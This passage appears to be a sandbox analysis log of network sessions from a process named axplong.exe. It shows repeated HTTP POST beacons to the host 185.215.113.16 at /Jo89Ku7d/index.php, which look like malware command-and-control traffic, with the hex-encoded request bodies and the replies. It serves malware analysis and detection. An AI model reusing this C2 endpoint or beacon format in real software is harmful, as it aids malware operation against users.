51	192.168.2.4	49788	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:04.531793118 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:05.284898043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:05.285657883 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:05.537102938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49789	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:05.655040026 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:06.404422998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:06.407891035 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:06.663551092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49790	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:06.795744896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:07.574040890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:07.579018116 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:07.833329916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49791	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:07.957067966 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:08.740272045 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49792	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:08.750328064 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:09.533279896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49793	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:09.661549091 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:10.422943115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49794	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:10.512006998 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:11.269042015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49795	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:11.391357899 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:12.151005983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49796	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:12.178961992 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:12.982997894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49797	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:13.095339060 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:13.846007109 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:13.890846968 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:14.138700008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49798	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:14.254865885 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:15.014260054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:15.022809982 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:15.867674112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 19, 2024 06:05:15.867757082 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 19, 2024 06:05:15.868498087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49799	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:16.010960102 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:16.749135971 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49800	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:16.765265942 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:17.531069040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49801	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:17.657097101 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:18.405919075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:18.409421921 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:18.656764984 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49802	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:18.802552938 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:19.554543018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:19.559302092 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:19.808276892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49803	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:19.943123102 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:20.677675962 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49804	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:20.693059921 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
